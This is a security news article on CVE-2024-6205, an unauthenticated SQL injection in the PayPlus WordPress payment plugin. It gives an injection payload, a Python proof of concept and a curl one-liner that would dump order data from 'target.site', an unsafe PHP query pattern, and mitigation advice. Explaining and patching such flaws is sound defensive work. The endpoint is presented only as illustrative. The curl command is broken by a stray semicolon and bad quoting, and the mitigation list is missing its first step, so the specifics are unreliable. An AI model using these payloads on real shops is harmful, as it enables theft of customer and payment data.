CVE CyberSecurity Database News

CVE-2024-6205 - PayPlus Payment Gateway WordPress Plugin (v6.6.8 and below) SQL Injection Vulnerability Exploit and Mitigation Guide

Poster -

On June 2024, a critical security issue, CVE-2024-6205, was found in the PayPlus Payment Gateway WordPress plugin, impacting all sites running plugin versions before 6.6.9. This plugin is commonly used with WooCommerce to enable online payments. The vulnerability exposes sites to unauthenticated SQL injection, potentially allowing hackers to access, modify, or destroy website databases—without ever needing to log in.

Security researchers published proof of concept exploits and WordPress plugin repositories have advised urgent upgrades. In this in-depth article, we’ll break down exactly how this vulnerability works, show exploit code (for educational awareness), and provide you with actionable steps to secure your site.

What does this mean?

The plugin exposes an API endpoint (meant for WooCommerce integrations) that takes user input from the web without correctly cleaning (“sanitizing”) it. If an attacker sends crafted input, it can change the meaning of the SQL queries the site runs—giving unauthorized access to sensitive data.

Technical Deep Dive & Exploit Example

Several API endpoints in vulnerable PayPlus versions do not sanitize user-provided data before passing it to SQL queries. For example, if the WooCommerce API exposes an endpoint like:

POST /wp-json/payplus/v1/order/get

And expects data like

{
  "order_id": "1234"
}

But this parameter is injected directly into a SQL query, such as

$order_id = $_POST['order_id'];
$result = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}orders WHERE id = '$order_id'");

If the plugin fails to sanitize $order_id, an attacker can craft a request like

{
  "order_id": "1234' OR 1=1 -- "
}

This would turn the SQL into

SELECT * FROM wp_orders WHERE id = '1234' OR 1=1 -- '

Thus, the database will return all orders, potentially exposing sensitive user and payment data.

Exploit Proof of Concept (PoC)

> Note:
> This code is for educational use only. Never attack sites you don’t own or control.

import requests

URL = "https://target.site/wp-json/payplus/v1/order/get";

# SQL Injection Payload
malicious_order_id = "1' OR 1=1 -- "

json_data = {
    "order_id": malicious_order_id
}

response = requests.post(URL, json=json_data)
print(response.text)

Expected result:
If the site is vulnerable, the response will dump all orders, regardless of authentication.

Even simpler

You don’t need any authentication tokens or logins to abuse this—it works straight from curl or similar tools!

curl -X POST 'https://target.site/wp-json/payplus/v1/order/get'; \
  -H 'Content-Type: application/json' \
  --data '{"order_id":"1\' OR 1=1 -- "}'

References & Research

- Original CVE Entry - CVE-2024-6205
- WPScan Vulnerability Advisory
- WordPress Plugin Repository (PayPlus)
- Patch Release Changelog

Find PayPlus for WooCommerce

- Click Update Now (or download and install the new zip from the official repo)

2. Block Unauthenticated API Access

If possible, block unauthenticated access to the specific REST API endpoints exposed by plugins you use—especially payment gateways.

3. Monitor Logs

Check your server logs and database for suspicious API requests, especially if you cannot pinpoint when the patch was applied.

4. Code Hygiene

If you manage custom plugins for WooCommerce, always sanitize any inputs used in SQL queries. Use WordPress $wpdb->prepare() for all dynamic queries.

Before

// UNSAFE!
$result = $wpdb->get_results("SELECT * FROM orders WHERE id = '$input'");

After

// SAFE!
$result = $wpdb->get_results($wpdb->prepare("SELECT * FROM orders WHERE id = %d", $input));

Final Words

CVE-2024-6205 is a reminder that even trusted WordPress plugins can have serious flaws. Unauthenticated SQL injection is one of the most dangerous attacks for web applications. If you use PayPlus or other e-commerce plugins, be very prompt about updating them and monitoring your site’s security.

Have you found weird traffic on your logs, or seen unauthorized access to shop data? Let us know in the comments.

Resources

- Update Plugins
- WordPress Security Guide

Timeline

Published on: 07/19/2024 06:15:03 UTC
Last modified on: 08/01/2024 14:00:15 UTC